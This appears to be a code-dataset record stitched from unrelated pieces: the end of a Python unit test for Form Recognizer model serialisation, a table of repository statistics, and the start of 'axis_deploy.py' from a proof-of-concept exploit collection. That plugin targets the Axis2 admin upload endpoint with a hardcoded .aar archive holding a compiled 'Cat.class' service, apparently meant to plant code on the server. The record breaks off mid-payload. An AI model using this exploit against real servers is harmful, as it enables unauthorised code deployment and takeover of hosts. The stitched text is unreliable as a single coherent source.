accuracy=0.98,
)
}
)
d = model.to_dict()
final = {
"model_id": "1234",
"form_type": "submodel",
"accuracy": 0.98,
"fields": {
"example": {
"label": "field_label",
"name": "field",
"accuracy": 0.98,
}
}
}
assert d == final
def test_custom_form_model_to_dict(self):
model = _models.CustomFormModel(
model_id="1234",
status="ready",
training_started_on=datetime(2021, 1, 10, 23, 55, 59, 342380),
training_completed_on=datetime(2021, 1, 10, 23, 55, 59, 342380),
submodels=[
_models.CustomFormSubmodel(
model_id="1234",
form_type="submodel",
accuracy=0.98,
fields={
"example": _models.CustomFormModelField(
label="field_label",
name="field",
accuracy=0.98,
)
}
)
],
errors=[
_models.FormRecognizerError(
code=404,
message="error not found",
)
],
training_documents=[
_models.TrainingDocumentInfo(
name="sample doc",
status="succeeded",
page_count=3,
errors=[
_models.FormRecognizerError(
code=404,
message="error not found",
)
],
model_id="1234",
)
],
model_name="sample model",
properties=_models.CustomFormModelProperties(
is_composed_model=True,
)
)
d = model.to_dict()
final = {
"model_id": "1234",
"status": "ready",
"training_started_on": datetime(2021, 1, 10, 23, 55, 59, 342380),
"training_completed_on": datetime(2021, 1, 10, 23, 55, 59, 342380),
"submodels": [{
"model_id": "1234",
"form_type": "submodel",
"accuracy": 0.98,
"fields": {
"example":
{
"label": "field_label",
"name": "field",
"accuracy": 0.98,
}
}
}],
"errors": [
{
"code": 404,
"message": "error not found",
}
],
"training_documents": [
{
"name": "sample doc",
"status": "succeeded",
"page_count": 3,
"errors": [
{
"code": 404,
"message": "error not found",
}
],
"model_id": "1234",
}
],
"model_name": "sample model",
"properties": {
"is_composed_model": True,
}
}
assert d == final
| 35.638158
| 84
| 0.333078
| 3,094
| 37,919
| 3.894312
| 0.058177
| 0.100423
| 0.080671
| 0.071707
| 0.922732
| 0.900988
| 0.882812
| 0.872272
| 0.840734
| 0.832849
| 0
| 0.158361
| 0.538543
| 37,919
| 1,063
| 85
| 35.671684
| 0.530232
| 0.008254
| 0
| 0.796098
| 0
| 0
| 0.09612
| 0.001117
| 0
| 0
| 0
| 0
| 0.019512
| 1
| 0.019512
| false
| 0
| 0.002927
| 0
| 0.023415
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fa5d6df801750fde4d908852fd9ed5759ff66651
| 17,559
|
py
|
Python
|
middlewareScan/plugins/axis_deploy.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 11
|
2020-05-30T13:53:49.000Z
|
2021-03-17T03:20:59.000Z
|
middlewareScan/plugins/axis_deploy.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-13T03:25:18.000Z
|
2020-07-21T06:24:16.000Z
|
middlewareScan/plugins/axis_deploy.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-30T13:53:51.000Z
|
2020-12-01T21:44:26.000Z
|
#coding:utf-8
#author:wolf@future-sec
import urllib2
def run(host,port,timeout,cookies):
url = "http://%s:%d"%(host,int(port))
upload_url = url + '/axis2/axis2-admin/upload'
boundary = '-----------------------------3233243418974'
data = []
aar_file = "\x50\x4B\x03\x04\x0A\x00\x00\x08\x00\x00\xFB\x73\x6C\x45\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x04\x00\x4D\x45\x54\x41\x2D\x49\x4E\x46\x2F\xFE\xCA\x00\x00\x50\x4B\x03\x04\x0A\x00\x00\x08\x08\x00\xFA\x73\x6C\x45\x45\x93\x1C\x16\x5A\x00\x00\x00\x67\x00\x00\x00\x14\x00\x00\x00\x4D\x45\x54\x41\x2D\x49\x4E\x46\x2F\x4D\x41\x4E\x49\x46\x45\x53\x54\x2E\x4D\x46\xF3\x4D\xCC\xCB\x4C\x4B\x2D\x2E\xD1\x0D\x4B\x2D\x2A\xCE\xCC\xCF\xB3\x52\x30\xD4\x33\xE0\xE5\x72\xCC\x43\x12\x71\x2C\x48\x4C\xCE\x48\x55\x00\x8A\x01\x25\x2D\xF5\x8C\x78\xB9\x9C\x8B\x52\x13\x4B\x52\x53\x74\x9D\x2A\x41\xEA\xCD\xF5\x0C\xE2\xCD\x0D\x75\x93\x0C\x4D\x14\x34\xFC\x8B\x12\x93\x73\x52\x15\x9C\xF3\x8B\x0A\xF2\x8B\x12\x4B\x80\xFA\x35\x79\xB9\x78\xB9\x00\x50\x4B\x03\x04\x0A\x00\x00\x08\x00\x00\xFA\x73\x6C\x45\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x6C\x69\x62\x2F\x50\x4B\x03\x04\x0A\x00\x00\x08\x08\x00\xFA\x73\x6C\x45\x59\x1F\x55\xA8\xA1\x0C\x00\x00\xD7\x19\x00\x00\x09\x00\x00\x00\x43\x61\x74\x2E\x63\x6C\x61\x73\x73\x9D\x58\x09\x78\x5C\x55\x15\xFE\x4F\x32\xC9\x9B\x4C\x5F\x9B\x26\x69\xD2\x2C\x4D\xDB\x74\xCD\x1E\x0A\xA5\x4B\x52\x4A\x9B\x34\x6D\x43\xB3\x74\x49\x5B\xD2\xB2\x4D\x26\x2F\xC9\xB4\x33\xF3\xD2\x99\x37\x4D\x2B\xE0\x46\x15\xF7\x0D\x10\x51\x41\x50\x31\x2A\x05\x43\xD1\x49\x64\x58\x54\x50\x90\xAA\x2C\xA2\xA2\xE2\x2E\x2A\xAE\x20\xEE\x0B\xF8\xDF\x37\x4B\x66\x92\x29\xE5\xB3\xDF\x97\xBC\x9B\xBB\x9C\x7B\xCE\x7F\xFE\xB3\xDC\x3E\xF6\xF2\xBD\x0F\x20\x1B\x0D\x72\x54\x43\x96\x20\xBB\xCD\x6D\x69\x70\x08\xE6\x1E\x72\x1F\x75\x37\xF9\xDC\x81\xA1\xA6\x9E\xFE\x43\x86\xC7\x12\x38\x8D\x80\xC7\x1C\xF0\x06\x86\x04\x85\x9D\x53\xCB\x7B\xAC\x20\xE7\x5A\x04\x9A\xC7\xE7\x0E\x85\x96\x9D\x23\x28\x48\x59\x6E\x53\x93\x5C\xCD\xDB\x73\x3C\x60\x0D\x1B\x96\xD7\x43\x49\x1B\x3C\x3E\x6F\xC0\x6B\x6D\xE4\x85\xD5\x35\xFB\x04\x8E\x36\x73\xC0\x70\x62\x8E\x20\x67\x6F\xEF\xD6\x86\x75\x79\xA0\x06\x3A\x72\x90\xEB\xE2\xA8\x50\x47\x11\xE6\x51\xEC\x90\x61\xED\x39\x1E\xB2\x0C\x7F\x7B\x52\x93\x79\xD5\x35\x33\x75\x51\x87\x4A\x74\xCC\x47\xA9\xC0\xE5\x0D\x75\x9B\x56\xBB\x7F\xC4\x3A\x2E\x28\xAE\xEE\x9C\x6E\x57\x4B\xCD\x01\x41\x7E\xA7\x37\x60\x74\x87\xFD\xFD\x46\xB0\xD7\xDD\xEF\x33\x94\x85\xA6\xC7\xED\xDB\xE7\x0E\x7A\xD5\xDF\xF1\xC9\xDC\x0D\xB6\xD6\x2E\x02\x56\xA9\xA3\x02\xB3\xA8\xB9\x35\xEC\x0D\x51\xED\x4E\x02\x47\x2B\x67\x53\xC5\x9D\x41\x73\xC4\x08\x5A\x5E\x83\xF3\xA5\x09\xF5\xC2\x96\xD7\xD7\x34\xB5\xC2\xAD\xAE\xF6\x63\x1E\x63\xC4\xF2\x9A\x81\x90\x86\x65\x82\x22\x7B\x9F\xD7\x6C\xEA\xE8\x49\xAE\x68\x58\x41\x13\x33\x09\x70\x61\x39\x2A\x15\x4C\x35\x3A\x34\x38\x9D\xC8\x72\xA1\x1E\x8D\x1A\x3D\x89\xFC\x69\xE8\xEB\x68\x02\xBD\xA2\x0D\x9A\xC1\x6E\xB7\x9F\x76\x2C\xAF\x9E\x89\x59\xCD\x0C\x9F\x69\x38\x57\xB0\x70\x6A\xB6\xDB\xB4\xE7\xB7\x18\x83\x5B\xCD\x70\x60\xA0\x3D\x18\x34\x83\x2E\xAC\xC6\x1A\x0D\xE7\x27\xD4\xB7\x37\xF6\x0E\x07\xCD\x51\x85\x98\x8E\xB5\xCA\x6F\x2E\x82\xD2\x65\x84\x42\xEE\x21\xC3\x85\x55\x58\xAF\xA0\x6B\x9E\xE6\x8C\x84\x16\xFB\x14\xB8\x1B\x74\x5C\x00\x92\xC3\xC9\x83\xF6\x9D\x14\x5F\x3D\x53\x41\x27\x36\xD1\x51\x4D\x1E\x33\x30\xE8\x1D\x6A\x1C\x49\xC1\xA6\x1E\xAD\x3A\xDA\xB0\x85\xE7\x28\x62\xB7\x11\x32\xC3\x41\x8F\xB1\x39\xC4\x5B\x0C\xB7\x9F\xA0\x9D\x19\x00\xE5\x80\xC0\x48\xD8\x8A\x6D\x6D\x51\x38\x6F\xD5\xB1\x0D\xDB\xE9\x6B\x9F\xE9\x1E\x50\x3E\xCD\xB8\xB3\x66\x9F\x86\x8B\x04\x8B\xA7\x69\x49\xF2\xC5\xE0\x4A\xF8\x54\x20\x23\xA4\xE7\x99\x68\x51\x60\x24\x36\xF6\x9A\x31\xCD\xA6\xA9\x9B\x14\xD4\x92\x81\xF9\x1A\x76\x26\x08\x43\xF5\x62\x93\xFB\x83\x5E\xCB\xA0\xA7\x7A\x50\xA9\x61\x4F\x0A\xD1\x76\x72\xD5\x4A\xAC\xEE\xC6\x5E\xE5\x97\x7D\x2A\xA4\x92\xF6\xC5\x16\x5B\x0E\x28\xB7\xAC\xC6\xC5\x3A\xFA\xA0\xA2\x65\x44\x1D\xDC\x63\xB9\x3D\x87\x7B\x83\x6E\x8F\x91\x06\x49\x8A\x50\xDB\x9B\x3D\xB8\x44\xC7\xA5\x8A\x06\x4E\x2B\x69\x90\xF0\x4C\x71\x46\x9B\x04\x59\xA1\xD1\x24\x3C\xD3\x6C\xA0\xC7\x99\x3D\xE6\x86\xC2\x81\xC6\x43\x81\x70\x63\x22\x1F\xB9\x60\x60\x48\xC3\x60\x5A\xD6\x8A\x25\x0A\x1D\xC3\xF0\x0A\x66\x4D\x85\x25\xB3\xC0\x8A\xB3\xD0\x3F\x3E\xE5\xC4\x61\x01\x5C\xF0\xC3\xD4\x10\x48\x17\x6E\xEF\xD0\x31\x82\x23\x8C\xAB\xA3\x6E\x5F\xD8\xE8\x19\x9C\x26\x38\x91\x5E\x32\xA5\x27\x3F\x18\x94\x96\x02\xC5\xC1\x29\xBF\x9A\x38\xAA\x63\x54\xE5\xAB\x5C\xE3\x48\xD8\xED\x23\xE3\xB3\xCD\xFE\x43\xE9\x99\x36\x2E\x91\x70\x7B\x03\x09\xDA\xF5\x9A\x3D\x61\x2B\x49\x42\xC1\x9A\x33\x90\x33\x39\xDB\x7A\xDC\x32\x36\x07\x83\xEE\xE3\xA9\xE7\xC8\x9B\xAB\x05\x95\xAF\xBA\xC7\x85\xAB\x50\xA9\x7E\xBD\x51\xC7\x9B\xF0\x66\xE6\xBC\x51\xE5\x14\xDA\x5F\x7D\xB0\xB5\xA3\x43\xF9\xFA\x04\xDE\xAA\xE1\x2D\xA9\xA9\x6C\x4A\x05\x1D\xD7\xE2\x6D\xB4\x97\x63\xC6\x50\x0E\xCF\xD4\x74\xD0\xD9\xDE\x40\x92\x09\xD3\x54\xE6\xDE\x7E\xB7\x49\x20\x16\x9D\x45\x77\xD2\xA9\x9F\x92\x0E\xB6\x72\xE0\xE6\x0F\xC5\x16\x7B\xCC\x91\xE3\x29\xC2\x7A\xCD\xAD\x5E\x95\xC0\x6B\x33\xA3\x93\x29\x0F\x69\xB8\x9E\x40\x27\x76\xAB\xE3\xE9\x60\x5C\x87\xF5\xAA\xCC\xDC\xA8\xE3\x75\xB8\x52\xC1\x72\x93\x8E\x0F\xE3\x23\xE4\x9A\x65\x26\xF5\xA4\x0D\xD5\x35\x07\x5B\xD5\xEE\x9B\x15\x6A\xB7\xC4\x2D\x27\x56\xB7\xE2\xE3\x1A\x6E\x4B\x09\xD6\x54\xF1\x3A\x3E\xA1\x8A\x4B\xCE\xA0\x2F\x1C\x1A\x56\xA7\x6F\xD7\xF1\x29\x7B\xC6\xE3\x33\x43\x34\xC4\x31\xE2\xB6\x86\xC9\x91\x41\x05\x50\x79\xE7\x99\xD4\x24\x36\xD9\x1E\x55\xD1\x4F\x0A\xE6\xA7\x6E\x4A\xB1\xDE\x85\x3B\x94\x29\x7E\x7C\x4E\xC5\x3F\x35\x74\x18\xC7\x0C\x8F\x0B\xA7\xF0\x79\x0D\xF7\x30\x21\x4D\x81\xB3\x3B\x1C\xB0\xBC\x7E\xA6\xF5\x2F\x20\x12\x4B\xEB\xF1\x19\x95\xCC\x53\x89\x1E\x9F\x6E\x51\x52\x26\x75\x8C\xE3\x8B\x82\x95\x67\x89\x3A\xC6\xA7\x87\x45\x82\x67\xA2\xB8\x5F\xC3\x7D\x69\x37\xC7\x17\x75\x3C\x80\x07\x05\x73\x78\x73\x8A\x05\xB4\xAD\xFA\x4C\xD9\xDB\x8F\x2F\x2B\xB3\xBE\xA2\xF6\x1C\x6C\xCD\x5C\x70\x04\x0F\xEB\xE8\x42\xB7\x02\xCB\x3F\x90\xC6\xC7\x9E\xD4\xCC\xE4\x1C\x30\x47\x03\xB1\x1A\x90\xC9\x98\xCC\x2C\x7A\x2C\x51\x43\x03\x86\xD5\xD4\xE5\xF6\xB1\x08\xFB\x8D\x81\xBD\xBB\x3B\x53\x8A\xFC\x37\x04\x7A\x72\x0F\x97\x5C\x38\xAD\x5C\x72\x1A\x8F\xEB\x78\x02\x4F\xD2\x60\xA6\xAE\x40\x9B\x19\x08\x30\xFE\xED\x12\x52\x9E\x30\x38\x7E\x62\x6A\x8D\x36\x7F\x5B\xE1\xF7\x34\x93\x68\xE6\x1D\xCA\xE0\xEF\xEA\x78\x3F\x3E\x40\x83\xC3\x41\x1F\x59\x15\x1A\x36\x7C\xFC\x96\x64\xB0\xAA\x43\x19\xF1\xC3\x44\x72\xB0\x85\x05\x0E\x07\x08\xC4\x76\x33\x64\xA5\xD8\xF0\xA3\x44\xDF\xA1\xB6\xEC\x31\x3D\x87\x0D\xCB\x85\x67\xF1\x13\x85\xFE\xF7\xD5\xE8\x67\x3A\x7E\x8E\x5F\x70\x17\x9D\x97\x9E\xB3\x4A\x53\xBC\x97\xC6\x5E\x75\x8C\xA6\xFC\x2A\x61\x4A\x8A\x5E\xAD\xE1\xC1\x41\x23\xE8\xC4\x6F\x98\x31\xF7\x86\x8C\x60\x73\x9E\x0B\xCF\x61\xBD\x13\xBF\xE3\xC4\xE8\xB0\xE9\xF6\x7B\x95\x9D\x7F\x50\xE4\xF3\xAA\xA5\x3F\xE9\x78\x01\x2F\x72\xD1\x3D\x42\x2C\xE9\xC2\xFA\xD7\x54\x05\x62\xF7\xB4\x28\x09\x97\x28\x36\xFD\x45\xC7\x5F\x55\x94\xAB\xD6\x44\x85\x79\x48\x45\xF2\xCD\x6A\xE5\x1F\xCA\xD2\x7F\x0A\xCA\xEC\x74\x98\x99\x69\x7E\xFC\x5B\x9D\xFF\x4F\x66\xA8\x6B\x54\x0A\x73\x0C\x13\x57\x15\xE0\x66\x90\x1F\x09\x25\xBB\xE9\x29\x5C\x55\x54\x9B\x61\x2B\xB5\x4A\x4E\x0B\x7A\x3D\xD1\x38\xED\x64\x9A\x50\x38\x30\x71\xD7\x4B\xAE\x2E\x9A\x38\x63\xE1\x63\xAF\x76\x92\xCB\x46\x50\xA9\x3C\xA3\xB9\x8A\x2D\xB5\x38\xC5\x45\x25\x9A\x5C\xA2\xCB\x1C\x4D\x66\x33\x36\x32\xEE\xD3\x25\x5F\xE6\xC6\xCA\x6C\xA2\xD9\x12\x2C\x39\x33\xC0\x71\x4E\x12\xD6\xD3\x52\xA8\x8B\xDD\xDD\x6B\xAA\x46\xDB\x59\xAD\xC0\x2E\x2C\xB1\x13\x89\xCC\xDD\xFC\x9A\x02\x6E\xE6\x0C\x5B\x17\x4D\xE6\x27\x08\xA4\x6A\x88\xED\x50\x63\x20\xD6\x51\x68\x52\xC6\x60\xCA\x84\x62\xA2\x2F\xBA\x4E\x2A\xE8\x58\x59\x90\xD9\x65\xAA\x33\x92\x52\x59\xA8\xB6\x2C\x12\xD4\x55\x67\xF6\x48\x46\x36\x48\x89\x54\xA9\x73\x4B\x54\x77\x3B\xBD\xE5\x52\xEB\xCB\x64\x85\x26\xCB\xE9\xAF\xF4\x35\x55\x48\x9A\x79\x1A\xB7\x93\x26\x03\x6E\x8B\x35\xCF\x31\x68\x83\x24\x6C\xCE\xB2\xFA\xD9\x3E\x95\x76\x66\x36\x57\x15\x55\x77\xD8\x32\x05\x17\xFD\x9F\x78\x66\xEA\x93\xE4\x9C\xB8\x8E\x8D\x5E\xB3\xD1\xF2\x8F\x0C\x78\x89\xEB\xB9\x89\x9C\x16\xAF\x38\x2E\x59\x25\xAB\x55\x88\x3C\xCA\x91\x8A\x25\x91\xB5\x3A\x1E\xC1\xA3\x4E\x59\xCF\xD7\xE1\xB2\x2B\x63\x07\xAF\x76\x49\x8B\x5C\xA0\xC9\x86\x44\xC1\xB2\x3B\xE4\xA0\x31\x64\x1C\x6B\x22\x3B\x68\x43\x40\x97\x8D\xAA\xA7\xCB\x39\x12\x36\x2D\x23\x8F\x62\x37\xE9\xB2\x19\xB9\x14\x12\x32\x46\xDC\x41\xB7\xA5\x9E\x25\x7E\x69\xD3\x65\x8B\xB4\xB3\x4C\x05\x8D\x11\x1F\xBB\xD4\xCD\x2A\xC3\xAD\x7B\x6D\x79\x3B\x43\xCF\xC6\x7B\xB6\xE9\xB2\x5D\x75\x17\xB9\x03\x86\xCF\x50\x9D\x0F\x1F\xAF\x44\xDC\xA9\xC0\x8F\x3D\xAC\x72\x69\xC4\x16\x2F\x23\x4A\xE3\x20\x46\xDC\x39\x69\xC5\x59\x3D\x84\xED\xD7\x90\x35\x6C\x32\x07\x35\x9E\x25\x07\x05\x8D\x41\x1F\x93\x76\x53\x6C\x7F\x8B\x0A\xE2\x5D\xBA\xEC\x16\x76\xF1\x85\x14\xB3\xC5\xE0\x93\x9B\xCE\x8D\x2D\x33\x55\x54\xB2\xDB\x78\x95\xE3\xB2\x57\xF6\x6B\xB2\x2F\xD1\xD7\x64\xD8\xA3\xCB\xC5\x89\x58\x8C\x5B\xE4\x8F\xAB\xAA\xF9\x13\x97\x54\xBC\xCA\x15\xE4\x20\x5D\x23\xFE\x64\x53\x92\x79\x93\xC3\xEF\x56\x8D\x5F\x49\xF5\xC1\xCC\x79\x52\xA4\x5F\xC7\x62\x54\x39\xF1\x5F\xF5\x00\x1B\x72\xE2\x65\x97\x0C\x89\x57\x93\xE1\xB4\xB6\xA0\x23\x60\x91\x19\x4C\x3F\x87\x84\xBD\xBA\x93\xDE\x0F\xB1\xB5\xB1\xCE\xF0\xB6\xEC\x50\x82\xD9\x5B\x3D\xA3\x0A\xD2\x6A\x31\xD5\x73\x66\x96\x26\x47\xD2\x1E\xAF\x29\xEF\x34\x87\x3B\x38\xA4\x9E\x9E\x19\x94\x24\xAD\xF6\xD8\x69\x2E\xE6\x64\x27\x5F\xFF\x8D\x6A\x13\xAA\x98\x6C\xB3\x01\x64\xC1\xA9\xFE\xFB\x82\x23\xA7\x7A\x9F\x73\x36\x0F\xEA\x5F\x01\xC7\x2E\xCC\xE2\xDF\x3A\xFF\x6A\xE3\x57\xFD\xAB\x28\x9C\x7D\x0F\xF2\x27\x51\x30\x89\xE2\x9B\x90\xC7\xC1\x18\x72\x4F\x21\x9F\x93\x77\xDB\xC2\xCA\xF8\x7B\x8E\x2D\xB8\x84\x62\xCB\x50\x8E\x79\xFC\x51\x2B\xA0\x88\x8A\xA4\xC0\x26\x7E\x95\xC8\x9C\xDA\x09\x2C\x98\x3A\x9A\x6B\x4F\xC6\x8E\xE8\xB1\x0D\x58\x88\x45\xFC\xE6\x29\x98\xB9\x6B\x09\xC7\x0E\xAE\x2C\xB5\xC5\x8C\xF0\x2A\xB5\x6B\x4D\x14\xCB\xFB\x26\xB0\x72\x47\xED\x29\x54\xF7\x3D\x82\x05\xFB\x0B\x6B\x27\x51\xD7\x77\x0F\xAA\xC7\x90\x1F\xC5\xAA\x03\x97\x47\x70\xDE\x04\xD6\x3D\x18\x41\x4B\xE1\x85\x11\x6C\x8E\xA0\xBD\x76\x9C\x67\x0B\xA8\x68\x25\x3A\xD2\x54\x5F\x42\xDB\x97\xF2\x1D\xB9\x2C\xA9\x87\x13\x8D\xD8\x81\x4E\x5B\x0F\x36\x60\x71\x23\xF6\x51\x3B\x65\x58\x79\x14\x3D\xBC\x7D\x57\x67\x6D\x14\xBB\xFB\xEA\x1C\x13\xE8\x8D\x60\x7F\x5D\x04\x07\xC7\xA7\x81\xD2\x60\x4B\x2A\xA6\xF9\xE5\x36\x44\xF6\x69\x5C\x86\xCB\x6D\xFC\x0B\x71\x05\xDC\xB6\x07\x58\x68\xE2\x77\xAC\x88\x23\x9F\x5B\xD8\x3F\x89\x81\xF1\x69\x48\xAD\x4D\x82\x9B\xA7\xFE\x17\x29\x7E\xA6\x8B\x33\x6A\xB5\xA2\xF6\x11\xE4\x64\x9F\x2C\x3C\x44\x2C\x7C\x11\x04\x23\x08\xDF\x04\x2D\x7B\x0C\x0E\xC7\xC9\x69\x8A\x6D\x26\xA8\xAD\x14\xBA\x25\x05\xFA\x0A\x1C\xC3\x71\x5B\x34\x5F\x0E\x33\xA0\xBF\x96\x63\x07\xBF\x2B\xA3\xB8\x8A\xC6\xBF\xBE\xB3\xC0\x81\xFB\x9C\x5D\xD9\x1B\xC7\xE0\xAA\xAB\xCF\xAE\x8C\xE0\x0D\xB5\xF5\x11\x5C\xD3\xB7\x31\xEB\xD6\x57\x5E\xAC\x9B\xD2\x7C\x21\x79\x06\x62\xE8\xE4\x93\x7B\x0E\x76\x62\x2E\x76\xD1\xDE\xDD\xBC\x78\x17\x43\xA8\xD7\x56\xA0\x36\x26\x1A\x6F\xC7\x3B\x6C\x64\x16\xE1\x9D\x78\x17\xAF\x9E\x43\x09\xEF\xC6\x7B\x28\x69\x2E\xED\x7D\x2F\xDE\x47\xE5\xF3\x54\x87\x38\x43\xBD\xC3\x5C\x51\x86\x55\x46\x71\x5D\x5F\xDD\x04\x6E\xE8\xAA\x27\x0A\x1F\x8C\xE0\x43\x11\x7C\x94\x7A\x7D\x8C\x3F\x9F\x9C\x22\x9E\x62\x2B\xE8\x88\x3C\xBA\x62\x1E\xDD\x50\x4A\x47\x2C\x40\xBF\xAD\xCC\xE2\x98\xA0\xB8\x32\x6A\x34\x66\xC3\x9F\xC7\x9D\x9F\xC6\x67\x28\x21\x0F\x9F\x85\x77\x86\x0A\x9B\x28\x53\xE1\x58\x12\x85\xBF\x2F\x8A\x3B\xFA\xC8\xF5\x3B\x63\x3A\x4C\xE0\xAE\xE9\xAE\x3C\x9C\x82\x7C\x89\x7D\x83\x42\x9E\x4D\x61\xDC\xA9\x06\x25\x2B\x47\x57\x29\x69\x93\xB8\xBB\x36\x82\x89\x08\xEE\x8D\xC9\x63\x08\x4E\xE0\x4B\xE3\x9D\x75\x93\x78\x68\xDC\x16\x51\x4E\xF7\x2D\x4D\x73\x71\x98\x33\x47\x69\xD4\x68\x0A\xF7\xAA\xF0\x55\xFB\xA2\x05\x54\xF5\x32\x7C\xCD\x36\x8A\xA5\x2E\x6E\x4A\x2E\xBF\x5F\x8F\x1B\xB3\x83\x32\xD4\x89\xA2\x28\x4E\x2B\x43\xBE\x19\xC1\xB7\x22\x78\x8A\x17\x7E\x67\x0A\x45\x97\xBD\xE5\x1A\x12\xF9\x44\xCA\x25\x45\xF8\x9E\x7D\x89\x1A\x25\x90\x63\x6A\x4B\xB9\xE4\x07\xF1\x4B\x5E\x22\x35\x14\x39\xBC\x51\x3C\xDB\x57\x5B\x31\x81\x1F\x77\xD1\x4D\x3F\xED\xE6\xAF\x5F\x36\x3B\x1A\xA2\x78\xAE\xAF\xF0\xD7\x13\x78\xBE\xF0\xB7\x93\xF8\x7D\x04\x7F\x8C\xE0\xCF\x11\xBC\x14\xC1\xDF\xB2\xD7\xE4\x14\xCC\x25\xFD\x9A\x73\xC7\xB0\xB8\x41\x21\x54\x96\x9B\x5D\x9C\x53\x38\x7B\x02\x7F\x27\xF1\xB9\xBB\x70\x76\x04\xFF\xE2\xCE\x32\x47\x59\xAE\x62\xE5\x9A\x1C\xD2\xF2\x99\x29\xD5\x6B\xA9\x3C\xC8\x2C\x17\x59\x95\x4F\x5E\x15\x93\x55\xE7\x90\x57\xE7\xF1\x51\xDB\x8C\xEB\x71\x01\x6E\xC0\x01\x7E\x87\x71\xA3\x6D\xDA\xF6\x98\xA2\xF8\x6F\xDC\x34\x2F\x5E\xE6\x29\xA6\x5B\x12\xE8\x15\x51\x52\xF3\x71\x40\x44\xB2\x88\x5B\x31\x59\xAD\xC8\xE3\xA0\xB4\x35\x36\x6B\x73\x28\xB3\xC9\x66\x72\x2E\xF2\x24\x3B\x19\xED\x6B\x6D\xC0\x80\xF9\x51\x48\xDF\x84\x38\x98\xAD\x22\x92\x53\x24\x79\x11\x99\x15\x91\x82\xE9\x9C\xB9\x65\x2A\xFC\x65\x9E\x14\x67\x40\xF4\x84\x9D\xDE\x99\x46\xA2\x52\xD2\x17\x95\xD2\x3E\x3B\x1C\x2A\x27\xA4\xBC\x7E\x42\xF8\x59\xDC\xEC\x28\x73\xD4\x46\x64\x69\x99\x23\x22\x2B\xA7\xE0\x28\xB4\x03\xF0\x0E\xCA\x3F\x49\xFE\xDF\xC9\xC0\xBC\xCB\xBE\x6B\x75\x4C\x9A\x54\xC7\xCD\x5E\x21\x35\x71\x5D\x56\xD8\x65\x24\xCB\x1E\xBD\x20\xB5\x34\xBB\x1C\xBA\xD4\x49\x3D\x25\xE5\x49\x83\x34\x66\x20\xD5\x44\xBC\xF4\x6C\x2B\x92\x26\x66\xB7\xEE\xA8\xAC\xEA\x6B\xA8\x9B\x90\xF3\x9A\x1D\xB5\x4A\xA1\xF3\x27\x65\x4D\x7D\x91\xAC\x9B\x94\x66\xE5\xFB\x06\xA6\x31\x7A\xFF\x94\x5C\x18\xF7\xBD\xB4\xD2\xB3\xCD\x39\x6A\xEB\xD6\xFD\x65\x39\x53\xF0\x94\xDB\x62\xEF\xA5\x8F\xA2\x34\xE5\x3E\x32\xFF\x7E\x6C\xE4\x9B\x7C\x0B\x1E\xB4\xCD\xD8\x18\xBB\x36\x49\xCC\x6D\x72\x51\xDC\x8C\x6D\x76\x44\x64\xF1\xE4\x26\xD9\xC1\x51\x36\xCF\x9F\x2F\x9D\xD2\x45\x33\x36\xD2\x10\x76\x1A\x54\x3A\x4F\xBA\xA5\x27\xEE\xB3\x3B\xB9\x47\x81\xD5\x7E\xD6\xD2\x23\x3B\x3B\xB3\x2F\x18\xC3\xFC\xBA\x05\xE7\x76\xD7\x36\x44\xA4\xD7\x4E\xC8\x39\x0D\xE3\x27\xB2\x64\x41\xDD\x03\xB7\xBD\xF2\xBC\x8C\xDB\xC5\x66\x36\x09\xD1\x91\x96\x2E\x1F\x62\x31\x7A\x18\x35\x54\xAE\x81\x61\xBA\x8E\x41\xDA\xCC\xBF\xDB\xF0\x58\x4A\xBA\x6C\x97\x3E\xDB\x9C\x65\xA8\x62\x83\x7D\x90\x92\x56\xA0\x52\x2E\x21\xDD\xB2\x78\x6A\xB6\x5C\x2A\x97\xA9\x74\x29\x97\xCB\x15\x71\xD5\x47\xE3\x41\x5D\x35\x29\xEE\xCE\xBA\x22\xF1\x44\x64\x80\x1F\x83\x9F\x49\x19\x9C\x14\xDF\x18\x9C\x9D\x75\x11\x09\xDC\x6D\x63\x53\xCA\x47\xC0\x48\x5A\xC2\x7C\x9C\x17\x3F\x41\x74\x9F\x64\x06\x79\x8A\x44\x79\x3A\x25\x61\x56\x49\x50\x42\x76\x42\x9C\x6F\xD7\x4E\xE1\x1E\x87\x5D\xEB\x58\xFA\xC5\x52\xBE\x92\xF0\xFF\x00\x50\x4B\x03\x04\x0A\x00\x00\x08\x08\x00\xFA\x73\x6C\x45\x23\xFC\x37\xC9\xDA\x00\x00\x00\xC5\x01\x00\x00\x15\x00\x00\x00\x4D\x45\x54\x41\x2D\x49\x4E\x46\x2F\x73\x65\x72\x76\x69\x63\x65\x73\x2E\x78\x6D\x6C\x8D\x91\xC1\x6A\xC3\x30\x10\x44\xCF\xF1\x57\x08\xDD\xAB\x35\x69\x0F\xA5\xC8\xBE\xF8\x94\x43\x69\x48\xFB\x03\x8B\xB2\xC4\x02\x5B\x16\xBB\x4A\x54\xFF\x7D\x65\xD2\x94\x26\xE4\x90\xA3\xC4\xCC\xBE\x61\xC6\x0A\xF1\xC9\x3B\x52\x01\x47\x6A\x74\x87\x49\xAB\xB6\x5A\xD9\x3D\x89\x63\x1F\x93\x9F\x42\x79\xAE\xB6\x03\xA1\x90\xFA\x9A\x23\xA9\x79\x3A\xB2\xBA\xD8\xFE\xE9\x54\x4F\x4C\xC5\x0A\xD7\x5E\x3B\x92\x08\x1E\x68\x47\x8E\xFC\x89\x58\x96\x7B\xB7\x9F\x6A\xA4\xD8\xE8\x3E\xA5\xF8\x06\x90\x73\x36\xF9\xD9\x4C\x7C\x80\x75\x5D\xBF\x40\xFD\x0A\x59\xF6\x03\xF8\xF0\x34\x85\x61\xD6\xCA\x0D\x28\xD2\xE8\x22\x30\x18\xD1\xF5\x64\xF0\xDB\xCB\xDA\x70\x74\x86\x2F\x1